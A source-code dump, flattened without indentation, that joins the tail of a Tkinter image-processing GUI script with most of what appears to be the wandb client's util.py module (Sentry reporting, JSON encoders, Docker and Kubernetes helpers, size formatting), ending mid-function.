window = Tk(); window.geometry('200x200');
window.title('Image Processing & Data Analysis Ver 0.5')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='File', menu=fileMenu)
fileMenu.add_command(label='Open', command=openFile)
fileMenu.add_command(label='Save', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='Exit', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='Pixel-point processing', menu=pixelMenu)
pixelMenu.add_command(label='Identity', command=equal)
pixelMenu.add_command(label='Brighten', command=addImage)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='Geometric processing', menu=geoMenu)
geoMenu.add_command(label='Flip vertical', command=upDown)
geoMenu.add_command(label='Pan', command=panImage)
geoMenu.add_command(label='Zoom out', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='Data analysis', menu=analyzeMenu)
analyzeMenu.add_command(label='Average', command=a_average)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='Other formats', menu=otherMenu)
otherMenu.add_command(label='Export to CSV', command=saveCSV)
otherMenu.add_command(label='Export to CSV (shuffled)', command=saveShuffleCSV)
otherMenu.add_command(label='Import from CSV', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='Export to SQLite', command=saveSQLite)
otherMenu.add_command(label='Import from SQLite', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='Export to MySQL', command=saveMySQL)
otherMenu.add_command(label='Import from MySQL', command=openMySQL)
window.mainloop()
|
util.py | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import binascii
import colorsys
import contextlib
import codecs
import errno
import functools
import gzip
import hashlib
import json
import logging
import math
import numbers
import traceback
import os
import re
import shlex
import socket
import sys
import threading
import time
import random
import shortuuid
import importlib
import tarfile
import tempfile
import types
from typing import Optional
import yaml
from datetime import date, datetime
import platform
from six.moves import urllib
from typing import Any, Dict
import requests
import six
from six.moves import queue, input
from sys import getsizeof
from six.moves.collections_abc import Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from wandb.env import error_reporting_enabled, get_app_url
import wandb
from wandb import env
from wandb.errors import CommError, term
logger = logging.getLogger(__name__)
_not_importable = set()
MAX_LINE_BYTES = (10 << 20) - (100 << 10) # imposed by back end
IS_GIT = os.path.exists(os.path.join(os.path.dirname(__file__), "..", ".git"))
RE_WINFNAMES = re.compile(r'[<>:"/\?*]')  # raw string avoids the invalid "\?" escape warning
# these match the environments for gorilla
if IS_GIT:
SENTRY_ENV = "development"
else:
SENTRY_ENV = "production"
if error_reporting_enabled():
sentry_sdk.init(
dsn="https://a2f1d701163c42b097b9588e56b1c37e@o151352.ingest.sentry.io/5288891",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV,
)
POW_10_BYTES = [
("B", 10 ** 0),
("KB", 10 ** 3),
("MB", 10 ** 6),
("GB", 10 ** 9),
("TB", 10 ** 12),
("PB", 10 ** 15),
("EB", 10 ** 18),
]
POW_2_BYTES = [
("B", 2 ** 0),
("KiB", 2 ** 10),
("MiB", 2 ** 20),
("GiB", 2 ** 30),
("TiB", 2 ** 40),
("PiB", 2 ** 50),
("EiB", 2 ** 60),
]
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc, delay=False):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
if delay:
time.sleep(2)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
def sentry_set_scope(process_context, entity, project, email=None, url=None):
# Using GLOBAL_HUB means these tags will persist between threads.
# Normally there is one hub per thread.
with sentry_sdk.hub.GLOBAL_HUB.configure_scope() as scope:
scope.set_tag("process_context", process_context)
scope.set_tag("entity", entity)
scope.set_tag("project", project)
if email:
scope.user = {"email": email}
if url:
scope.set_tag("url", url)
def vendor_setup():
"""This enables us to use the vendor directory for packages we don't depend on
Returns a function to call after imports are complete. Make sure to call this
function or you will modify the user's path which is never good. The pattern should be:
reset_path = vendor_setup()
# do any vendor imports...
reset_path()
"""
original_path = [directory for directory in sys.path]
def reset_import_path():
sys.path = original_path
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, "vendor")
vendor_packages = ("gql-0.2.0", "graphql-core-1.1")
package_dirs = [os.path.join(vendor_dir, p) for p in vendor_packages]
for p in [vendor_dir] + package_dirs:
if p not in sys.path:
sys.path.insert(1, p)
return reset_import_path
def apple_gpu_stats_binary():
parent_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(parent_dir, "bin", "apple_gpu_stats")
def vendor_import(name):
reset_path = vendor_setup()
module = import_module(name)
reset_path()
return module
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
:param (str) required: A string to raise a ValueError if missing
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
def get_optional_module(name) -> Optional[types.ModuleType]:
return get_module(name)
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
we use this for tensorflow and other optional libraries primarily at the top module level
"""
# The lint error here is incorrect.
def __init__(
self, local_name, parent_module_globals, name, warning=None
): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
raise AttributeError()
np = get_module("numpy")
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def app_url(api_url):
"""Returns the frontend app url without a trailing slash."""
# TODO: move me to settings
app_url = get_app_url()
if app_url is not None:
return app_url.strip("/")
if "://api.wandb.test" in api_url:
# dev mode
return api_url.replace("://api.", "://app.").strip("/")
elif "://api.wandb." in api_url:
# cloud
return api_url.replace("://api.", "://").strip("/")
elif "://api." in api_url:
# onprem cloud
return api_url.replace("://api.", "://app.").strip("/")
# wandb/local
return api_url
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split(".")[0] + "." + o.__class__.__name__
def is_uri(string):
parsed_uri = urllib.parse.urlparse(string)
return len(parsed_uri.scheme) > 0
def local_file_uri_to_path(uri):
"""
Convert URI to local filesystem path.
No-op if the uri does not have the expected scheme.
"""
path = urllib.parse.urlparse(uri).path if uri.startswith("file:") else uri
return urllib.request.url2pathname(path)
def get_local_path_or_none(path_or_uri):
"""Check if the argument is a local path (no scheme or file:///) and return local path if true,
None otherwise.
"""
parsed_uri = urllib.parse.urlparse(path_or_uri)
if (
len(parsed_uri.scheme) == 0
or parsed_uri.scheme == "file"
and len(parsed_uri.netloc) == 0
):
return local_file_uri_to_path(path_or_uri)
else:
return None
def make_tarfile(output_filename, source_dir, archive_name, custom_filter=None):
# Helper for filtering out modification timestamps
def _filter_timestamps(tar_info):
tar_info.mtime = 0
return tar_info if custom_filter is None else custom_filter(tar_info)
unzipped_filename = tempfile.mktemp()
try:
with tarfile.open(unzipped_filename, "w") as tar:
tar.add(source_dir, arcname=archive_name, filter=_filter_timestamps)
# When gzipping the tar, don't include the tar's filename or modification time in the
# zipped archive (see https://docs.python.org/3/library/gzip.html#gzip.GzipFile)
with gzip.GzipFile(
filename="", fileobj=open(output_filename, "wb"), mode="wb", mtime=0
) as gzipped_tar, open(unzipped_filename, "rb") as tar:
gzipped_tar.write(tar.read())
finally:
os.remove(unzipped_filename)
def _user_args_to_dict(arguments):
user_dict = {}
i = 0
while i < len(arguments):
arg = arguments[i]
split = arg.split("=", maxsplit=1)
# flag arguments don't require a value -> set to True if specified
if len(split) == 1 and (
i + 1 >= len(arguments) or arguments[i + 1].startswith("-")
):
name = split[0].lstrip("-")
value = True
i += 1
elif len(split) == 1 and not arguments[i + 1].startswith("-"):
name = split[0].lstrip("-")
value = arguments[i + 1]
i += 2
elif len(split) == 2:
name = split[0].lstrip("-")
value = split[1]
i += 1
if name in user_dict:
wandb.termerror("Repeated parameter: '%s'" % name)
sys.exit(1)
user_dict[name] = value
return user_dict
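# Worked example (illustrative): bare flags become True; "k=v" and "k v" pairs
# both become string values.
#   _user_args_to_dict(["--epochs=5", "--verbose", "--lr", "0.1"])
#   -> {"epochs": "5", "verbose": True, "lr": "0.1"}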
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith("tensorflow.") and (
"Tensor" in typename or "Variable" in typename
)
def is_tf_eager_tensor_typename(typename):
return typename.startswith("tensorflow.") and ("EagerTensor" in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith("torch.") and (
"Tensor" in typename or "Variable" in typename
)
def is_jax_tensor_typename(typename):
return typename.startswith("jaxlib.") and "DeviceArray" in typename
def get_jax_tensor(obj):
import jax
return jax.device_get(obj)
def is_fastai_tensor_typename(typename):
return typename.startswith("fastai.") and ("Tensor" in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith("pandas.") and "DataFrame" in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith(".Figure")
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ("outward", 0.0)
if isinstance(position, str):
if position == "center":
position = ("axes", 0.5)
elif position == "zero":
position = ("data", 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == "outward" and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted."
)
return obj
def matplotlib_to_plotly(obj):
obj = ensure_matplotlib_figure(obj)
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
return tools.mpl_to_plotly(obj)
def matplotlib_contains_images(obj):
obj = ensure_matplotlib_figure(obj)
return any(len(ax.images) > 0 for ax in obj.axes)
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
try:
obj = obj.eval()
except RuntimeError:
obj = obj.numpy()
elif is_pytorch_tensor_typename(typename) or is_fastai_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.cpu().detach().numpy()
else:
return obj.item(), True
elif is_jax_tensor_typename(typename):
obj = get_jax_tensor(obj)
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
if isinstance(obj, float) and math.isnan(obj):
obj = None
elif isinstance(obj, np.generic) and obj.dtype.kind == "f":
# obj is a numpy float with precision greater than that of native python float
# (i.e., float96 or float128). in this case obj.item() does not return a native
# python float to avoid loss of precision, so we need to explicitly cast this
# down to a 64bit float
obj = float(obj)
elif isinstance(obj, bytes):
obj = obj.decode("utf-8")
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
elif callable(obj):
obj = (
"{}.{}".format(obj.__module__, obj.__qualname__)
if hasattr(obj, "__qualname__") and hasattr(obj, "__module__")
else str(obj)
)
elif isinstance(obj, float) and math.isnan(obj):
obj = None
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn(
"Serializing object of type {} that is {} bytes".format(
type(obj).__name__, getsizeof(obj)
)
)
return obj, converted
def json_friendly_val(val):
"""Make any value (including dict, slice, sequence, etc) JSON friendly"""
if isinstance(val, dict):
converted = {}
for key, value in six.iteritems(val):
converted[key] = json_friendly_val(value)
return converted
if isinstance(val, slice):
converted = dict(
slice_start=val.start, slice_step=val.step, slice_stop=val.stop
)
return converted
val, _ = json_friendly(val)
if isinstance(val, Sequence) and not isinstance(val, six.string_types):
converted = []
for value in val:
converted.append(json_friendly_val(value))
return converted
else:
if val.__class__.__module__ not in ("builtins", "__builtin__"):
val = str(val)
return val
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return (
{
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size,
},
True,
)
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ["DISPLAY", "WAYLAND_DISPLAY", "MIR_SOCKET"]
_WEBBROWSER_NAMES_BLACKLIST = ["www-browser", "lynx", "links", "elinks", "w3m"]
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if "linux" in sys.platform and not any(
os.getenv(var) for var in _DISPLAY_VARIABLES
):
launch_browser = False
try:
browser = webbrowser.get()
if hasattr(browser, "name") and browser.name in _WEBBROWSER_NAMES_BLACKLIST:
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id(length=8):
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list("0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(length)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
if hasattr(obj, "json_encode"):
return obj.json_encode()
# if hasattr(obj, 'to_json'):
# return obj.to_json()
tmp_obj, converted = json_friendly(obj)
if converted:
return tmp_obj
return json.JSONEncoder.default(self, obj)
class WandBJSONEncoderOld(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return "NaN"
elif obj == float("+inf"):
return "Infinity"
elif obj == float("-inf"):
return "-Infinity"
return obj
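# Worked example (illustrative): non-finite floats become the strings the W&B
# backend expects, and containers are converted recursively.
#   make_safe_for_json({"a": float("nan"), "b": (1, float("inf"))})
#   -> {"a": "NaN", "b": [1, "Infinity"]}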
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
if e.response is None:
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code in (400, 409):
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
raise CommError("Invalid or missing api_key. Run wandb login")
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def find_runner(program):
"""Return a command that will run program.
Arguments:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith("#!"):
return shlex.split(first_line[2:])
if program.endswith(".py"):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
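# Worked example (illustrative): for 10 values down to 5, ratio = (10 - 1) / (5 - 1)
# = 2.25, so the kept indices are int(i * 2.25) = 0, 2, 4, 6, 9 (both endpoints kept).
#   downsample(range(10), 5) -> [0, 2, 4, 6, 9]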
def has_num(dictionary, key):
return key in dictionary and isinstance(dictionary[key], numbers.Number)
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode("ascii")
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
# TODO(jhr, cvp): refactor
if wandb.run:
return wandb.run._settings.log_internal
return os.path.join("wandb", "debug-internal.log")
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(
r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$",
image,
)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
It excludes any arguments that start with a dash, and the argument following a dash unless
it is a boolean switch. This can be improved; we currently fall back gracefully when it fails.
"""
bool_args = [
"-t",
"--tty",
"--rm",
"--privileged",
"--oom-kill-disable",
"--no-healthcheck",
"-i",
"--interactive",
"--init",
"--help",
"--detach",
"-d",
"--sig-proxy",
"-it",
"-itd",
]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
if most_likely == None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
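# Worked example (illustrative): boolean switches are skipped, and the first
# candidate containing ':', '@' or '/' wins.
#   image_from_docker_args(["run", "-it", "--rm", "ubuntu:20.04", "bash"])
#   -> "ubuntu:20.04"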
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id. Specify the
KUBERNETES_NAMESPACE environment variable if your pods are not in
the default namespace:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/{}/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"),
os.getenv("KUBERNETES_PORT_443_TCP_PORT"),
os.getenv("KUBERNETES_NAMESPACE", "default"),
os.getenv("HOSTNAME"),
)
try:
res = requests.get(
k8s_server,
verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3,
headers={"Authorization": "Bearer {}".format(open(token_path).read())},
)
res.raise_for_status()
except requests.RequestException:
return None
try:
image_id = res.json()["status"]["containerStatuses"][0]["imageID"]
# str.strip() removes a character set, not a prefix, so trim the prefix explicitly
prefix = "docker-pullable://"
return image_id[len(prefix):] if image_id.startswith(prefix) else image_id
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
Returns a new method that will call the original with any args, waiting for up to timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(
target=wrapped_target, args=(q,) + args, kwargs=kwargs
)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
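# Hedged usage sketch (illustrative; some_slow_function is hypothetical): wrap a
# slow call and give up after one second; thread.is_alive() reveals a timeout.
#   slow_with_timeout = async_call(some_slow_function, timeout=1)
#   result, thread = slow_with_timeout()
#   if result is None and thread.is_alive():
#       ...  # timed out; the call is still running in the background thread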
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [
colorsys.hsv_to_rgb(i / (class_count - 1.0), 1.0, 1.0)
for i in range(class_count - 1)
]
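# Illustrative output (a sketch): class 0 is black; the rest are equally
# spaced, fully saturated hues as float RGB triples.
# class_colors(3) -> [[0, 0, 0], (1.0, 0.0, 0.0), (0.0, 1.0, 1.0)]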
def _prompt_choice(input_timeout: int = None, jupyter: bool = False,) -> str:
input_fn = input
prompt = term.LOG_STRING
if input_timeout:
# delayed import to mitigate risk of timed_input complexity
from wandb.sdk.lib import timed_input
input_fn = functools.partial(timed_input.timed_input, timeout=input_timeout)
# timed_input doesn't handle enhanced prompts
if platform.system() == "Windows":
prompt = "wandb"
text = f"{prompt}: Enter your choice: "
if input_fn == input:
choice = input_fn(text)
else:
choice = input_fn(text, jupyter=jupyter)
return choice
def prompt_choices(
choices, allow_manual=False, input_timeout: int = None, jupyter: bool = False,
):
"""Allow a user to choose from a list of options"""
for i, choice in enumerate(choices):
wandb.termlog("(%i) %s" % (i + 1, choice))
idx = -1
while idx < 0 or idx > len(choices) - 1:
choice = _prompt_choice(input_timeout=input_timeout, jupyter=jupyter)
if not choice:
continue
idx = -1
try:
idx = int(choice) - 1
except ValueError:
pass
if idx < 0 or idx > len(choices) - 1:
wandb.termwarn("Invalid choice")
result = choices[idx]
wandb.termlog("You chose '%s'" % result)
return result
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Arguments:
shape (tuple): the tensor shape to inspect.
risky (bool): if True, allow guesses that are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return "label"
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return "image"
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return "image"
else:
# (samples, height, width, logits)
return "segmentation_mask"
return None
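# Illustrative guesses (a sketch, not exhaustive):
# guess_data_type((32, 10)) -> "label" (batch of logits)
# guess_data_type((32, 28, 28), risky=True) -> "image" (e.g. a grayscale mask)
# guess_data_type((32, 64, 64, 3)) -> "image" (RGB channels last)
# guess_data_type((32, 64, 64, 21)) -> "segmentation_mask" (per-pixel logits)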
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if os.sep in dest_path:
mkdir_exists_ok(os.path.dirname(dest_path))
with fsync_open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
def to_human_size(bytes, units=None):
units = units or POW_10_BYTES
unit, value = units[0]
factor = round(float(bytes) / value, 1)
return (
"{}{}".format(factor, unit)
if factor < 1024 or len(units) == 1
else to_human_size(bytes, units[1:])
)
def from_human_size(size, units=None):
units = {unit.upper(): value for (unit, value) in units or POW_10_BYTES}
regex = re.compile(
r"(\d+\.?\d*)\s*({})?".format("|".join(units.keys())), re.IGNORECASE
)
match = re.match(regex, size)
if not match:
raise ValueError("Size must be of the form `10`, `10B` or `10 B`.")
factor, unit = (
float(match.group(1)),
units[match.group(2).upper()] if match.group(2) else 1,
)
return int(factor * unit)
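# A hedged round-trip sketch with explicit units, since POW_10_BYTES is
# defined elsewhere in this module; the units list below is illustrative.
def _example_human_size_roundtrip():
    units = [("B", 1), ("KB", 10 ** 3), ("MB", 10 ** 6)]
    text = to_human_size(1500, units=units)        # "1.5KB"
    size = from_human_size("1.5 KB", units=units)  # 1500
    return text, size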
def auto_project_name(program):
# if we're in git, set project name to git repo name + relative path within repo
